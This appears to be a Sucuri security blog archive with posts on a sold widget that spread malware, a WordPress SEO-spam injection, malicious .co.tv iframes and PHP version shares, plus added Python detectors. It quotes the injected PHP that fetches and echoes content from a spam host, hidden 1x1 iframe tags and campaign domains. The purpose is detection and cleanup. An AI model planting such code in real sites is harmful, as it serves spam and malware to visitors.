The Danger of Remote Widgets – Feedcat.net Sold and Now Distributing Malware

Do you like to add all types of “widgets” and cool badges to your site? Be careful which ones you choose, or your site may get compromised. Be especially careful if the widget vendor sells the technology and doesn’t inform its users. Why, you may ask?

Recently, a popular widget site (feedcat) was sold on flippa. Out of nowhere, sites that had its code embedded started redirecting visitors to random sites, showing annoying pop-up ads, and distributing malware.

This little piece of code was doing it:

<script src="http://www.feedcat.net/js2/button.js?pub=xx&amp;bmode=b83x16&amp;ilng=en&amp;section="..

So, if you’re one of the 300k sites using feedcat, remove it now. If you are seeing weird pop ups or ads on your site, check to make sure you don’t have it installed.

If your site is currently redirecting to an Amazon site and getting stuck there you probably have the feedcat code on your site:

http://continue_.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAIKDZBVZT6ABSN6MA&Expires=1311373754&Signature=60QGS34LES2ymcgNXV2WT1Iq2Zg%3D

You can use our free scanner to see if your site has it: sitecheck.sucuri.net

Let us know if you have any questions.

*update:

Other people are complaining about it too.

Top linked sites – What webmasters are linking to

We scan hundreds of thousands of sites daily here at Sucuri, and while analyzing some of the data we got interested in which sites get the “link love” most often.

By link love, I mean which sites most webmasters point “do follow” links at from their own sites. After extracting the data from the last 500k scans we did, these were the top ten:

  1. 6.9% – www.facebook.com
  2. 6.4% – twitter.com
  3. 2.8% – wordpress.org
  4. 2.6% – youtube.com
  5. 1.9% – feeds.feedburner.com
  6. 1.2% – www.linkedin.com
  7. 1.2% – www.google.com
  8. 1.1% – validator.w3.org
  9. 1.1% – www.adobe.com
  10. 0.9% – www.addthis.com

This means that 6.9% of the sites had a link to Facebook, 6.4% to Twitter, and so on. I was actually surprised to see validator.w3.org ranked so well. We would be in a much better place if even 1% of the sites validated properly.

It also shows the strength of WordPress, with almost 3% of the sites linking there (and probably using WordPress).

Those were the top 30:

  1. www.facebook.com
  2. twitter.com
  3. wordpress.org
  4. www.youtube.com
  5. feeds.feedburner.com
  6. www.linkedin.com
  7. www.google.com
  8. validator.w3.org
  9. www.adobe.com
  10. www.addthis.com
  11. www.flickr.com
  12. www.myspace.com
  13. feedburner.google.com
  14. www.blogger.com
  15. www.macromedia.com
  16. statcounter.com
  17. www.amazon.com
  18. www.addtoany.com
  19. www.wordpress.org
  20. creativecommons.org
  21. bit.ly
  22. en.wikipedia.org
  23. facebook.com
  24. www.statcounter.com
  25. www.liveinternet.ru
  26. www.histats.com
  27. feeds2.feedburner.com
  28. www.apple.com
  29. www.gnu.org
  30. www.stumbleupon.com

It is also interesting that people link to shortened URLs (bit.ly) so often. What do you think? Which sites do you link to from your own sites?
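For readers who want to reproduce the “link love” measurement on their own pages, here is an added example (not Sucuri’s scanner) that parses each page with the Python standard library, keeps only anchors without rel="nofollow", drops links back to the page’s own host, and reports the percentage of pages linking to each external host, which is what the figures above express. The sample pages and their hostnames are constructed for the example.

```python
"""Tally which external hosts a set of pages link to with "do follow" anchors."""
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlparse


class AnchorCollector(HTMLParser):
    """Collect href targets of <a> tags, honouring rel="nofollow"."""

    def __init__(self):
        super().__init__()
        self.dofollow = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        a = dict(attrs)
        rel = (a.get("rel") or "").lower().split()
        href = a.get("href")
        if href and "nofollow" not in rel:
            self.dofollow.append(href)


def external_hosts(page_url, html):
    """Return the set of distinct external hosts this page links to (do-follow only)."""
    own = (urlparse(page_url).hostname or "").lower()
    parser = AnchorCollector()
    parser.feed(html)
    hosts = set()
    for href in parser.dofollow:
        host = urlparse(href).hostname  # None for relative links such as "/about"
        if host and host.lower() != own:
            hosts.add(host.lower())
    return hosts


def tally(pages):
    """pages: dict url -> html. Return [(host, percent of pages linking there)], descending."""
    counts = Counter()
    for url, html in pages.items():
        counts.update(external_hosts(url, html))  # one count per page, not per link
    total = len(pages)
    return [(h, round(100.0 * n / total, 1)) for h, n in counts.most_common()]


# Constructed sample pages (not real scan data).
SAMPLE_PAGES = {
    "http://blog-a.example/": '<a href="http://www.facebook.com/blogA">fb</a> '
                              '<a href="http://twitter.com/blogA">tw</a> '
                              '<a href="/about">about</a>',
    "http://blog-b.example/": '<a rel="nofollow" href="http://twitter.com/x">tw</a> '
                              '<a href="http://wordpress.org">wp</a> '
                              '<a href="http://www.facebook.com">fb</a>',
    "http://blog-c.example/": '<a href="http://www.facebook.com">fb</a> '
                              '<a href="http://www.facebook.com/other">fb2</a>',
    "http://blog-d.example/": '<a href="http://bit.ly/abc">short</a>',
}

if __name__ == "__main__":
    for host, pct in tally(SAMPLE_PAGES):
        print(f"{pct:5.1f}% - {host}")
```

Note that blog-b’s Twitter link is ignored because it carries rel="nofollow", and blog-c’s two Facebook links count once, since the ranking is by sites linking, not by number of links.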

Python: No such file or directory – Your site is likely compromised

If you run a WordPress site and you are seeing the following error at the top of your pages:

sh:  /usr/local/bin/python: No such file or directory

It means that the site is likely compromised. How do we know? We were tracking a large blackhat SEO spam campaign (targeting WordPress sites) and noticed that for the last few days one of their link distribution domains was broken and generating an error. So any hacked site would display that error instead of the spammy links.

This is the code that caused it (added to the index.php of the hacked sites):

<?php
        // Build a request to the spam distribution server, passing along the
        // visitor's IP, user agent and referer so it can tailor what it returns
        $url = "http://apollos.com.tw/LHRS/12/request.php?ip=".$_SERVER['REMOTE_ADDR']."&useragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."&referer=".urlencode($_SERVER["HTTP_REFERER"]);
        // Fetch whatever the remote server answers (normally the spammy links)
        $answer = file_get_contents($url);
        // Unless the server says "noredirect", print its response into the page as-is,
        // which is why an error message from that server ends up at the top of every page
        if (strpos($answer,"noredirect") === false) {
                echo $answer;
        }
?>

As you can see, it attempts to connect to apollos.com.tw to get the list of links to display. However, if you access this domain now you will get a Python error instead…
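Grepping for the exact domain only catches this one campaign. As an added example (not Sucuri’s code), the following Python script looks for the shape of the injection instead: a PHP file that builds a URL from request data ($_SERVER REMOTE_ADDR, HTTP_USER_AGENT or HTTP_REFERER), fetches it with a remote-capable function such as file_get_contents, and echoes the answer. A second function spots the “sh: … python: No such file or directory” line on a rendered page. The injected and clean index.php samples and the broken page are constructed for the example (the injected one follows the snippet quoted above).

```python
"""Detect the remote-content injection pattern in PHP source, and its page-level symptom."""
import re

FETCH_RE = re.compile(r"\b(file_get_contents|curl_exec|fopen|fsockopen)\s*\(", re.I)
REQUEST_DATA_RE = re.compile(r"\$_SERVER\s*\[\s*['\"](REMOTE_ADDR|HTTP_USER_AGENT|HTTP_REFERER)['\"]\s*\]")
REMOTE_URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
ECHO_RE = re.compile(r"\b(echo|print)\s*\(?\s*\$")
SYMPTOM_RE = re.compile(r"sh:\s*\S*python\S*:\s*No such file or directory")


def php_remote_injection(source):
    """Return a dict of evidence when all three ingredients are present, else None.

    Ingredients: a remote fetch call, visitor data read from $_SERVER, a hard-coded
    remote URL, and the fetched variable being echoed into the output.
    """
    fetch = FETCH_RE.search(source)
    leaks = sorted({m.group(1) for m in REQUEST_DATA_RE.finditer(source)})
    urls = REMOTE_URL_RE.findall(source)
    echoes = ECHO_RE.search(source)
    if fetch and leaks and urls and echoes:
        return {"fetch": fetch.group(1), "request_data": leaks, "remote_urls": urls}
    return None


def page_symptom(html):
    """True if the rendered page carries the error line the broken domain produced."""
    return SYMPTOM_RE.search(html) is not None


# Constructed sample: the injected index.php shape from the post, prepended to a normal WordPress index.php.
INJECTED_PHP = r'''<?php
$url = "http://apollos.com.tw/LHRS/12/request.php?ip=".$_SERVER['REMOTE_ADDR']."&useragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."&referer=".urlencode($_SERVER["HTTP_REFERER"]);
$answer = file_get_contents($url);
if (strpos($answer,"noredirect") === false) {
    echo $answer;
}
?>
<?php
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>
'''

# Constructed sample: a stock WordPress index.php.
CLEAN_PHP = r'''<?php
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>
'''

# Constructed sample: what a hacked page looked like while the distribution domain was broken.
BROKEN_PAGE = "sh:  /usr/local/bin/python: No such file or directory\n<!DOCTYPE html><html><body>post</body></html>"

if __name__ == "__main__":
    print(php_remote_injection(INJECTED_PHP))
    print(php_remote_injection(CLEAN_PHP))
    print(page_symptom(BROKEN_PAGE))
```

Run it over every .php file in the document root; a legitimate plugin can trigger the same combination, so treat a hit as something to read, not something to delete blindly.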

These are some of the other domains being used in this spam campaign:

apollos.com.tw
coolbloglinks.com
iqitiq.com
readerspot.com
tsarstvonebesnoe.ru
wat.az

If you are unsure if your site is compromised, try doing a quick scan here: http://sitecheck.sucuri.net

Google blocks .co.cc, attackers are now using .co.tv

It is being reported that Google took action against the high number of malware sites in the .co.cc domain, removing more than 11 million sites from their search results.

For us this is good news, since we haven’t seen anything good coming from there (only malware and spam). They did a similar thing a few weeks ago, blacklisting the whole .cz.cc domain.

However, just as they blacklisted .co.cc, we are starting to see the attackers switching tactics and using different free domains. The popular one now is .co.tv:

<iframe src="http://uhcmsgfq.co.tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://yswlifofj.co.tv/?go=1" width="1" height="1"></iframe>

<iframe width="1" height="1" src="http://vmvfonc.co.tv/?go=1"></iframe>

<iframe src="http://cvfplmpsap.co.tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://kwhnqxvslf.co.tv/?go=1" width="1" height="1"></iframe>

Those are just some of the malicious iframes we are seeing on hacked sites now (a few weeks ago they would have been on the .co.cc domain). As you can see from their names (vmvfonc.co.tv, kwhnqxvslf.co.tv, yswlifofj.co.tv, etc.), they are random and being mass generated.
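Both the feedcat story at the top of this page and the iframes above come down to the same question: what does my page pull in from hosts I don’t control? As an added example (not Sucuri’s SiteCheck), the Python script below runs two checks over raw HTML: every script loaded from a host outside an allowlist the site owner maintains (the feedcat button is the case in point, since whoever controls that host controls what runs on every embedding page), and iframes that are either sized 1x1 or hidden by style, or that point at the free subdomain services named in this post. The allowlist, the page host and the sample page are constructed for the example; the tags in the sample copy the shapes quoted on this page.

```python
"""Flag third-party script includes and hidden or throw-away-domain iframes in page HTML."""
import re
from urllib.parse import urlparse

# Hosts the site owner knowingly embeds (assumption: maintained per site).
APPROVED_SCRIPT_HOSTS = {"ajax.googleapis.com"}

# Free subdomain services the post reports as abused.
SUSPECT_SUFFIXES = (".co.cc", ".cz.cc", ".co.tv", ".co.be")

# Regular expressions rather than a DOM parser: injected tags often sit outside well-formed markup.
TAG_RE = re.compile(r"<(script|iframe)\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def parse_attrs(raw):
    """Turn the attribute text of one tag into a lower-cased dict."""
    out = {}
    for m in ATTR_RE.finditer(raw):
        out[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
    return out


def is_tiny(attrs):
    """True if width/height or an inline style make the frame effectively invisible."""
    try:
        w = int(attrs.get("width", "100").strip("px"))
        h = int(attrs.get("height", "100").strip("px"))
    except ValueError:  # percentages or other non-numeric sizes: treat as visible
        w = h = 100
    style = attrs.get("style", "").lower().replace(" ", "")
    return w <= 1 or h <= 1 or "display:none" in style or "visibility:hidden" in style


def scan_html(page_host, html):
    """Return a list of (reason, url) findings for one page."""
    findings = []
    for m in TAG_RE.finditer(html):
        tag, attrs = m.group(1).lower(), parse_attrs(m.group(2))
        src = attrs.get("src")
        if not src:
            continue
        host = (urlparse(src).hostname or "").lower()
        if not host or host == page_host:
            continue  # relative or same-origin include; out of scope here
        if tag == "script" and host not in APPROVED_SCRIPT_HOSTS:
            findings.append(("unapproved third-party script", src))
        if tag == "iframe":
            if host.endswith(SUSPECT_SUFFIXES):
                findings.append(("iframe on throw-away subdomain service", src))
            elif is_tiny(attrs):
                findings.append(("hidden 1x1 iframe", src))
    return findings


# Constructed sample page reproducing the tag shapes quoted in the posts.
SAMPLE_HTML = """
<html><head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<script src="http://www.feedcat.net/js2/button.js?pub=xx&amp;bmode=b83x16"></script>
<script src="/js/site.js"></script>
</head><body>
<p>content</p>
<iframe src="http://uhcmsgfq.co.tv/?go=1" width="1" height="1"></iframe>
<iframe width="1" height="1" src="http://vmvfonc.co.tv/?go=1"></iframe>
<iframe src="http://example.org/widget" width="1" height="1"></iframe>
<iframe src="http://www.youtube.com/embed/x" width="560" height="315"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for reason, url in scan_html("myblog.example", SAMPLE_HTML):
        print(f"{reason}: {url}")
```

The allowlist is the important part: any external script that is not on it gets reported, so the check still fires the day a previously trusted widget host changes hands, which is exactly what happened with feedcat.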

We are also seeing a lot of malware and spam in the .co.be domain range (like dumoxoveba21.co.be), but it seems Google banned the whole .co.be range as well.

What Google is doing is good, but the “war” is not over :)


If you are worried your site might be hacked or compromised, scan it here: http://sitecheck.sucuri.net.

WordPress 3.2 and PHP support – Security effect

WordPress 3.2 is going to be released very soon, and one of the biggest changes is that it will drop support for PHP 4 and all versions of PHP 5 below 5.2.4.

WordPress.org has provided some informative posts about their reasons for dropping support for these PHP versions.

But how will that affect their user base? And how many users are still running these old versions of PHP? We did some scanning and reached around 90 thousand self-hosted WordPress sites that had their PHP version displayed (via the Powered By header).

These are the numbers we found in our analysis (versions with less than 0.2% are not shown):

0.9% – PHP/4.3
5.1% – PHP/4.4
6.0% – PHP/5.1
0.7% – PHP/5.2.0
0.4% – PHP/5.2.1
0.4% – PHP/5.2.3
8.3% – PHP/5.3
76.4% – PHP/5.2.4+

What does this mean? It means that for 84% of the users, based on our numbers, nothing will happen. They will be able to continue using WordPress happily without major changes.

However, almost 15% of the users may experience problems when upgrading to WordPress 3.2 because of their current environment. They will have to contact their hosting, or try to figure out how to update PHP manually.
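Anyone repeating this tally from their own crawl should compare versions numerically, not as text: “5.2.17” sorts before “5.2.4” as a string but is newer, and real headers carry distro suffixes such as PHP/5.2.4-2ubuntu5.10. The following Python script is an added example (not Sucuri’s analysis) that parses Powered By header values, classifies each site against the 5.2.4 floor stated above, and reports the shares; the header sample is constructed and much smaller than the 90 thousand sites in the post.

```python
"""Classify PHP versions from Powered-By headers against the WordPress 3.2 minimum (5.2.4)."""
import re
from collections import Counter

MINIMUM = (5, 2, 4)  # WordPress 3.2 requirement stated in the post
VERSION_RE = re.compile(r"PHP/(\d+(?:\.\d+)*)", re.I)


def parse_php_version(header_value):
    """'PHP/5.2.4-2ubuntu5.10' -> (5, 2, 4); None if the header names no PHP version."""
    m = VERSION_RE.search(header_value or "")
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).split("."))


def meets_minimum(version, minimum=MINIMUM):
    """Pad missing components with 0 so 'PHP/5.3' is read as 5.3.0, then compare per component."""
    padded = version + (0,) * (len(minimum) - len(version))
    return padded >= minimum


def summarize(headers):
    """headers: list of Powered-By values, one per site. Returns percentage per class."""
    tally = Counter()
    for h in headers:
        v = parse_php_version(h)
        if v is None:
            tally["unknown"] += 1       # header present but not PHP (or no version exposed)
        elif meets_minimum(v):
            tally["ok"] += 1            # can take WordPress 3.2 as-is
        else:
            tally["needs_upgrade"] += 1  # host must update PHP first
    total = len(headers)
    return {k: round(100.0 * n / total, 1) for k, n in tally.items()}


# Constructed header sample (not the data set from the post).
SAMPLE_HEADERS = (
    ["PHP/5.2.17"] * 40
    + ["PHP/5.3.6-13ubuntu3.2"] * 30
    + ["PHP/5.2.4-2ubuntu5.10"] * 10
    + ["PHP/4.4.9"] * 10
    + ["PHP/5.1.6"] * 5
    + ["PHP/5.2.3"] * 3
    + ["ASP.NET"] * 2
)

if __name__ == "__main__":
    print(summarize(SAMPLE_HEADERS))
```

Hosts that strip the header (expose_php = Off) simply fall into the unknown bucket, which is why the post could only count sites that displayed their version.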

One of the great benefits in WordPress is the automatic update functionality. However, our analysis estimates that the move to require PHP 5 could leave roughly 15% of WordPress users with no easy update path. When you think of the big market share that WordPress owns, this makes for a very large amount of websites that will potentially remain out of date and vulnerable to attacks.

Will we see a higher number of outdated WordPress instances due to the move? It does seem the number will increase, at least until hosting providers step up their game (which I hope they will do soon).

If you’re running WordPress and aren’t sure what version of PHP you’re running, contact your hosting provider. Ask them, and if they’re running anything below 5.2.4, we recommend asking them to upgrade as soon as possible (or consider switching hosts). You can also scan your site here to see which version of PHP you are using: http://sitecheck.sucuri.net.

So what do you think? Good move by WordPress? Bad environment management by hosting providers? Can and will this lead to more hacked sites?

We’d love to hear from you, make sure to leave us a comment.